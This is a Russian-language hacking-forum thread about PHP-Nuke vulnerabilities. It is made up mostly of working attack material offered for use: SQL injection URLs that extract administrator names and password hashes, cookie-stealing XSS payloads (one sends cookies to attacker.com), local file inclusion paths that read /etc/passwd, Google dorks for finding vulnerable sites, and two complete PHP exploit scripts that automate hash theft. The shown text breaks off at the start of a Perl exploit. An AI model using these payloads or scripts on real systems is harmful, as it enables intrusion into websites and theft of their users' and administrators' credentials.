[ Обзор уязвимостей PHP-Nuke ]

Discussion in 'Веб-уязвимости' started by [53x]Shadow, 19 Jan 2008.

  1. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Обзор уязвимостей PHP-Nuke.

    [SQL-Injection]

    PHP-Nuke <= 8.0 Final (HTTP Referers) Remote SQL Injection Exploit

    PHP-Nuke <= 8.0 Final (INSERT) Remote SQL Injection Exploit


    PHP-Nuke <= 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql)


    PHP-Nuke <= 7.9 (Encyclopedia) Remote SQL Injection Exploit

    PHP-Nuke 7.5 - 7.8 (Search) Remote SQL Injection Exploit

    PHP-Nuke <= 7.8 Search Module Remote SQL Injection Exploit


    PHP-Nuke 7.8 SQL Injection / Remote Command Execution Exploit

    PHP-Nuke <= 7.8 (modules.php) SQL Injection Exploit


    [Remote File Inclusion]

    PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability

    PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions


    [XSS]

    PHP-Nuke versions: 8.0 (by ettee)

    Example:
    Code:
    [target]/modules.php?name=Search&query=<script+src=http://someshit.net/xss.jpg+
    
    xss.jpg:
    alert (document.cookie);
    PHP-Nuke versions: 7.8

    Example:
    Code:
    http://site.com/?pagetitle=title

    [Modules Vulns]

    PHP-Nuke NSN Script Depository 1.0.0 Remote Source Disclosure Vuln

    PHP-Nuke addon Nuke Mobile Entartainment LFI Vulnerability

    PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit

    PHP-Nuke Module Eve-Nuke 0.1 (mysql.php) RFI Vulnerability

    PHP-Nuke Module Addressbook 1.2 Local File Inclusion Exploit

    PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln

    PHP-Nuke Module splattforum 4.0 RC1 Local File Inclusion Exploit

    PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability

    PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit

    PHP-Nuke NukeAI Module 3b (util.php) Remote File Include Exploit



    [DB Structure]

    (cms)
    Code:
    [B][nuke_authors][/B]
    name
    email
    pwd
    radminsuper
    Hash = md5(pwd)

    (forum)
    Code:
    [B][nuke_users][/B]
    username
    user_email
    user_icq
    user_password
    user_newpasswd
    
    Hash = md5(user_password)


    [Default Paths]

    Admin:
    Code:
    [target]/admin.php
    Config:
    Code:
    [target]/config.php
     
    5 people like this.
  2. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    PHP-NUKE NukeSentinel Module

    Уязвимости в скриптах autohtml.php и autohtml0.php в параметре filename.

    [Local File Inclusion]

    PHP:
    http://site/autohtml.php?filename=../file.php 

    http://site/autohtml0.php?filename=../file.php
    [Information Leakage]

    PHP:
    http://site/autohtml.php?filename=../.htaccess 

    http://site/autohtml0.php?filename=../.htaccess 
    С помощью локального инклюда можно обнаружить важную информацию на сервере. В частности в .htaccess можно узнать настройки сайта, в том числе полный путь (что будет full path disclosure), при использовании NukeSentinel на сайте. А также можно обнаружить путь к его конфигурации и получить логины и хэши админов.

    [Full path disclosure]

    PHP:
    http://site/autohtml.php?filename=12345 
    На некоторых сайтах с данным скриптом, где не отключено выведение ошибок, при указании несуществующего файла выводится сообщение об ошибке с полным путём к скрипту.

    (c) MustLive <mustlive_(at)_websecurity.com.ua>
     
    #2 iddqd, 19 Jan 2008
    Last edited: 19 Jan 2008
    2 people like this.
  3. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    XSS
    Code:
    modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253c/script>bar
    modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/script>
    modules.php?name=Reviews&rop=postcomment&title=%253csc ript>alert%2528document.cookie);%253c/script>
    modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
    modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=<body onload=document.title=1337>
    modules.php?name=Downloads&op=search&query=><script>alert('ARIA')</script><
    modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=
    modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>
    modules.php?name=Web_Links&l_op=NewLinks&newlinkshowdays=
    modules.php?name=Journal&file=friend&jid=2&yun=
    modules.php?name=Journal&file=friend&jid=2&ye=
    modules.php?name=Journal&file=add&filelist[]=
    modules.php?name=Journal&file=modify&filelist[]=
    modules.php?name=Journal&file=delete&jid=&forwhat=waraxe
    modules.php?name=Journal&file=comment&onwhat=
    modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=
    modules.php?name=Encyclopedia&op=terms&eid=1&ltr=
    modules.php?name=Encyclopedia&op=content&tid=774&page=2&query=
    modules.php?name=Encyclopedia&file=search&eid=
    modules.php?name=Encyclopedia&file=search&query=f00bar&eid=
    modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&url_title=foobar&url=
    modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&cover=
    modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&rlanguage=
    modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&hits=
    modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=
    modules.php?name=Reviews&rop=savecomment&uname=&id=8&score=9
    modules.php?name=News&file=article&sid=1&optionbox=
    modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=
    modules.php?name=Stories_Archive&sa=show_month&year=&month=05&month_l=May
    modules.php?name=Stories_Archive&sa=show_month&year=2004&month=&month_l=May
    modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=
    modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=&order=0&thold=0
    modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=0
    modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=
    modules.php?name=NukeJokes&func=CatView&cat=
    modules.php?name=NukeJokes&func=JokeView&jokeid=
    modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=
    modules.php?name=Downloads&d_op=viewsdownload&sid=
    modules.php?name=Search&sid=
    modules.php?name=Search&query=*&max=
    modules.php?name=Search&query=waraxe&sel1=[xss]&type=comments
    modules.php?name=Search&a=6&query=*&match=
    modules.php?name=Search&query=*&mod3=
    modules.php?name=Calendar&file=submit&type=
    modules.php?name=Calendar&file=submit&op2=Preview&day=
    modules.php?name=Calendar&file=submit&op2=Preview&month=
    modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our query]
    modules.php?name=NukeJokes&func=CatView&cat=[xss code here]
    modules.php?name=NukeJokes&func=JokeView&jokeid=[xss code here]
    modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=users&category=2
    modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=comments&category=2
    modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=stories&category=2
    modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=reviews&category=2
    modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=45435[XSS]
    banners.php?op=EmailStats&login=[our_login]&cid=1&bid=
    modules.php?name=Encyclopedia&file=index&op=terms&eid=1&ltr=
    PHP:
    <html>
    <
    form name=searchform method=post action=http://[target]/modules.php?op=modload&name=Search_Enhanced&file=index>
    <input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'>
    <
    input type=submit name=sub>
    <
    script>document.searchform.sub.click()</script>
    </html>

    Search Module(all versions)

    <img src=http://www.microsoft.com/404.jpg style=display:none onerror=alert(document.cookie) <
    <iframe src=http://www.google.com style=display:none onload=alert(document.cookie) <

    Pool and News Module
    PHP:
    <img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+document.cookie);"
    SQL injection:
    Code:
    modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*
    modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors
    modules.php?name=Sections&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors
    modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/*
    modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
    modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1%20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users
    modules.php?name=Downloads&d_op=viewdownloadcomments&lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20FROM%20nuke_users/*
    modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
    modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
    modules.php?name=Downloads&d_op=modifydownloadrequest&lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,user_email,user_level,0,0%20FROM%20nuke_users
    modules.php?name=Downloads&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/*
    modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors
    modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*
    modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
    modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION%20SELECT%201,aid,name,pwd%20FROM%20nuke_authors
    modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors
    modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2
    modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
    modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
    modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
    modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1
    modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
    Full Path Disclosure
    modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=oob&date=00b
    /modules/Web_Links/voteinclude.php
    /modules.php?name=Statistics&op=convert_month
    /modules.php?name=Journal&file=add&filelist=oob
    /modules.php?name=Journal&file=modify&filelist=oob
    /db/db.php
    index.php?inside_mod=1
    /modules.php?name=Downloads&d_op=menu
    /modules.php?name=Web_Links&l_op=menu
    modules.php?name=Web_Links&l_op=viewlink&cid=1&show=oob
    modules/NukeJokes/mainfunctions.php
    modules.php?name=NukeJokes&func=JokeView&jokeid=oob
    modules.php?name=NukeJokes&func=CatView&cat=oob
    modules.php?name=Downloads&d_op=viewdownload&cid=2&show=oob
    modules/Calendar/config.php
    modules/Calendar/index.php
    /modules/Calendar/submit.php
    error.php?newlang=foobar
    modules/coppermine/include/crop.inc.php
    modules/coppermine/ecard.php
    modules/coppermine/displayecard.php
    modules/coppermine/db_input.php
    modules/coppermine/config.php
    modules/coppermine/addpic.php
    modules/coppermine/phpinfo.php
    modules/NukeJokes/mainfunctions.php
    modules.php?name=NukeJokes&func=JokeView&jokeid=foobar
    modules.php?name=NukeJokes&func=CatView&cat=foobar
    modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho
    modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1

    dork:
    "create the Super User" "now by clicking here"
    inurl:"modules.php?name=" inurl:Web_Links|inurl:downloads|inurl:Your_Account
    intext:"Thank you for trying PostNuke" intitle:"PostNuke Installation"
    "Warning: setlocale()"
    intitle:pHP-nuke.powered.site "create * Super User" "now * clicking here"
    "Powered by PHP-Nuke"
    Copyright © 2003 by PHP-Nuke
    "allinurl:modules.php sgallery"
    "powered by phphnuke 6.0"
    intitle:"PHP-Nuke Powered Site"
     
    _________________________
    #3 ettee, 19 Jan 2008
    Last edited: 20 Jan 2008
    4 people like this.
  4. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    PHP-Nuke <= 8.0 (sid) Remote SQL Injection

    Remote SQL Injection

    Vulnerable: PHP-Nuke <= 8.0

    Exploit:

    Code:
    <?php
    ##########################################################
    # UNPUBLISHED RST/GHC EXPLOIT
    # PHP Nuke `sid` sql injection exploit for Search module
    # POST method -
    # the best for version 8.0 FINAL
    # (c)oded by Foster & 1dt.w0lf
    ##########################################################
    # tested on 6.0 , 6.6 , 7.9 , 8.0 FINAL versions
    ##########################################################
    
    if (isset($_POST['Submit'])){
    $result=sendit('CONCAT("::",aid,"::",pwd,"::")');
    if (preg_match("/::([^:]*)::([a-f0-9]{32})::/",$result, $matches))
    {$ahash = $matches[2]; $aname = $matches[1];}
    
    }
    
    function sendit($param){
    $prefix = $_POST['prefix'];
    $data = $_POST['sql_text'];
    $host = $_POST['hostname'];
    $page = (isset($_POST['dir'])) ? '/'.$_POST['dir'] : '';
    $page .= '/modules.php?name=Search';
    $method = $_POST['method'];
    $ref_text = $_POST['ref_text'];
    $user_agent = $_POST['user_agent'];
    $result = '';
    $sock = fsockopen($host, 80, $errno, $errstr, 50);
    if (!$sock) die("$errstr ($errno)\n");
    fputs($sock, "$method /$page HTTP/1.0\r\n");
    fputs($sock, "Host: $host" . "\r\n");
    fputs($sock, "Content-type: application/x-www-form-urlencoded\r\n");
    fputs($sock, "Content-length: " . strlen($data) . "\r\n");
    fputs($sock, "Referer: $ref_text". "\r\n");
    fputs($sock, "User-Agent: $user_agent" . "\r\n");
    fputs($sock, "Accept: */*\r\n");
    fputs($sock, "\r\n");
    fputs($sock, "$data\r\n");
    fputs($sock, "\r\n");
    
    while (!feof($sock)) {
    $result .= fgets ($sock,8192);
    }
    fclose($sock);
    return $result;
    
    }
    
    
    ?>
    
    <head>
    <meta http-equiv=Content-Type content="text/html; charset=windows-1251">
    <TITLE>RST/GHC PHP Nuk'em exploit</TITLE>
    <style>
    a:link{color: #000000; text-decoration: none;}
    a:visited{color: #000000; text-decoration: none;}
    a:hover,a:active{color:#e49a34; text-decoration:underline;}
    table{color:#000000;font-family:verdana;font-size:8pt;}
    .style2 {
    color: #FFFFFF;
    font-weight: bold;
    }
    .style3 {color: #E39930}
    .style5 {color: #000000; font-weight: bold; }
    </style>
    <body bgcolor="#525254">
    <form method=post>
    <p class="style2"><font size="3" face="Arial, Helvetica, sans-serif">PHP Nuke <span class="style3">QUERY MANIPULATOR</span> based on <font size="3" face="Arial, Helvetica, sans-serif">`sid` POST sql injection</font> exploit for Search module </font></p>
    <table width="900" border="0">
    <tr bgcolor="#FFFFFF">
    <td width="12%"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">Parameter</font></strong></td>
    <td width="88%" bgcolor="#FFFFFF"><span class="style5"><font size="2" face="Arial, Helvetica, sans-serif">Value</font></span></td>
    </tr>
    <tr>
    <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">url
    </font></strong></td>
    <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input name="hostname" type="text" id="hostname" value="<?=(isset($_POST['hostname'])) ? $_POST['hostname'] : 'nuke.cc'; ?>">
    </font></td>
    </tr>
    <tr>
    <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">dir</font>
    </strong></td>
    <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input name="dir" type="text" id="dir" value="<?=(isset($_POST['dir'])) ? $_POST['dir'] : 'phpnuke'; ?>">
    </font></td>
    </tr>
    <tr>
    <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">referer</font></strong></td>
    <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input type="text" name="ref_text" value="<?=(isset($_POST['ref_text'])) ? $_POST['ref_text'] : 'http://jihad.in.us'; ?>" size="60">
    </font></td>
    </tr>
    <tr>
    <td bgcolor="E39930">SQL query</td>
    <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input type="text" name="sql_text" value="<?=(isset($_POST['sql_text'])) ? $_POST['sql_text'] : 'query=AAA&topic=&category=0&author=&days=0&type=comments&sid=999999\'/**/UNION%20SELECT%20`pwd`%20as%20title%20FROM%20nuke_authors%20WHERE%20radminsuper=\'1'; ?>" size="80">
    </font></td>
    </tr>
    <tr>
    <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">user
    agent</font></strong></td>
    <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input type="text" name="user_agent" value="<?=(isset($_POST['user_agent'])) ? $_POST['user_agent'] : 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)'; ?>" size="60">
    </font></td>
    </tr>
    <tr>
    <td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">table prefix </font></strong></td>
    <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input name="prefix" type="text" id="prefix" value="<?=(isset($_POST['prefix'])) ? $_POST['prefix'] : 'nuke'; ?>">
    </font></td>
    </tr>
    <tr>
    <td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">method</font></strong></td>
    <td bgcolor="#999999"><select name="method" size="1" id="method">
    <option value="POST">POST</option>
    <option value="GET">GET</option>
    </select></td>
    </tr>
    <tr>
    <td bgcolor="E39930">&nbsp;</td>
    <td bgcolor="#999999">&nbsp;</td>
    </tr>
    </table>
    <p>
    <input type="submit" name="Submit" value="rock-n-roll">
    </p>
    </form>
    
    
    
    
    <font size="2">(c) RST/GHC</font>
    
    <hr size="3">
    <?
    # DEBUG
    
    print $result;
    ?>
    
    # milw0rm.com [2008-01-22]
    
     
    1 person likes this.
  5. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    Remote SQL Injection

    PHP-Nuke < 8.0

    Exploit

    Code:
    <?php
    error_reporting (E_ERROR);
    ini_set("max_execution_time",0);
    
    echo '
    +=========================================+
    | RST/GHC unpublished PHP Nuke exploit <8 |
    +=========================================+
    <+> version <8.0
    <+> Tested on 7.9 & 6.0
    ';
    
    if ($argc < 2){
    print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n";
    print "ex.: " . $argv[0] . " phpnuke.org 7\n";
    credits();
    exit;
    }
    
    
    /* few definitions */
    if (empty($argv[3])){ $prefix = 'nuke';} #define tables prefix
    else {$prefix = $argv[3];}
    
    switch ($argv[2]){
    case "6":
    $query ="modules.php?name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1'";
    $version = 6;
    break;
    default:
    $query ="modules.php?name=News&file=article&sid=99999999'+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1";
    $version = 7;
    break;
    }
    
    $host = 'http://' . $argv[1] . '/'; # argv[1] - host
    $http = $host . $query;
    echo
    '[+] host: '.$host . '
    [+] nuke version: '.$version.'
    ';
    #DEBUG
    //print $http . "\n";
    
    $result = file_get_contents($http);
    
    preg_match("/([a-f0-9]{32})/", $result, $matches);
    if ($matches[0]) {print "Admin's Hash: ".$matches[0];
    if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];}
    else {echo "Exploit failed...";}
    
    credits();
    
    
    function credits(){
    print "\n\n+========================================+\n\r Coded by Foster \n\r Copyright (c) RST/GHC";
    print "\n\r+========================================+\n";
    exit;
    }
    
    ?>
    
    # milw0rm.com [2008-01-22]
     
    1 person likes this.
  6. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability

    example

    Code:
    http://www.xxxx/modules.php?op=modload&name=books&file=index&req=view_cat&cid={exploit}

    EXPLOIT 1 :

    Code:
    -90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201

    EXPLOİT 2 :


    Code:
    -90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201
    (c)milw0rm.com
     
    1 person likes this.
  7. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    PHP-Nuke Module Sections (artid) Remote SQL Injection

    SQL Injection

    Code:
    Пример:
    
    www.xxX/xxxxSections&op=viewarticle&artid=(exploit)
    
    Код:
    
    9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2
    Для поиска сайтов с этим модулем:

    Code:
    allinurl: "имя секции"
    (c)
     
    2 people like this.
  8. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    PHP-NUKE Modules Okul v1.0 Remote SQL Injection

    SQL Injection

    Code:
    modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

    PHP-Nuke Module Inhalt (cid) SQL Injection

    SQL Injection

    Code:
    modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2
    
    
    modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
    (c) biyofrm.com
     
  9. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    PHP-Nuke Modules Manuales 0.1 (cid) SQL Injection

    SQL Injection

    Code:
    modules.php?name=Manuales&d_op=viewdownload&cid=1/**/union/**/select/**/0,aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

    PHP-Nuke Module Siir (id) Remote SQL Injection

    SQL Injection

    Code:
    modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
    Для поиска

    Code:
    allinurl: modules-php-name-Siir
    (c) s@bun
     
  10. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection

    PoC:
    Code:
    /modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
    
     
  11. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability

    Exploit_:
    Code:
    modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors
    
    Exploit_2:
    Code:
    modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors
    
    
    (c) milw0rm.com
     
    #11 FraiDex, 25 Feb 2008
    Last edited: 25 Feb 2008
    1 person likes this.
  12. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Php Nuke "Sell" module SQL Injection ("cid")

    SQL Injection

    Exploit:

    Code:
    modules.php?name=Sell&d_op=viewsell&cid=-
    9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,
    aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
    
     
    1 person likes this.
  13. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    PHP-Nuke My_eGallery <= 2.7.9 Remote SQL Injection Vulnerability

    SQL Injection

    Exploit:

    Code:
    modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
    
     
  14. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    Passive XSS

    XSS
    Заходим на http://rus-phpnuke.com/ в поле поиска вбиваем
    "><iframe src="javascript:alert(document.cookie);" <
    и видим куки.
    Ксс в первом посте найденая ettee не пройдет, т.к. там стоит жесткая фильтрация гета, или только кодированием.

    Sql inj modules 4nAlbum
    File http://rus-phpnuke.com/modules.php?name=Files&go=view_file&lid=198
    example:
    http://site.name/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=[exploit]
    Injection:
    -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/1,2,concat(aid,%22:%22,pwd),4,5,6,7/**/from/**/nuke_authors/*where%20admin%20-2/*

    зы сплойты пойдут лесом если их правильно не закодировать. ^__^
    {c}gibson
     
  15. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    PHP-Nuke Copyright 2005 SQL

    Exploit:
    Code:
    -1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1 
    
    modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,
    aid,pwd+from+nuke_authors+where+radminsuper=1
    
    Google dork:
    Code:
    allintext:"PHP-Nuke Copyright © 2005 by Francisco Burzi" 
    allinurl:"gaestebuch_v22&func"
    
     
    #15 iddqd, 2 Mar 2008
    Last edited: 6 Mar 2008
  16. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    PHP-Nuke Module eGallery "pid" Remote SQL Injection


    PoC:
    Code:
    modules.php?name=eGallery&file=index&op=showpic&pi 
    d=-
    9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,
    aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
    
    PHP-Nuke Module "seminar" Local FIle Inclusion

    PoC:
    Code:
    modules.php?name=Seminars&op=showSpeech&fileName=../../../../../../../..
    /etc/passwd
    
    Google dork:
    Code:
    inurl:"modules.php?name=seminar"
    
    Regards,
    The-0utl4w
     
    #16 iddqd, 6 Mar 2008
    Last edited: 6 Mar 2008
    1 person likes this.
  17. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    PHP-Nuke KutubiSitte "kid" SQL Injection

    PHP-Nuke KutubiSitte "kid" SQL Injection

    Exploit:
    Code:
    #!/usr/bin/perl 
    use Getopt::Std;
    use LWP::UserAgent;
    
    sub usg{
    printf("
    
    
       -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
       |  PHP-NUKE  KutubiSitte [kid]  =>  SQL Injection   |
       -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
      #######################################################
      # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #
      #######################################################
    <-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
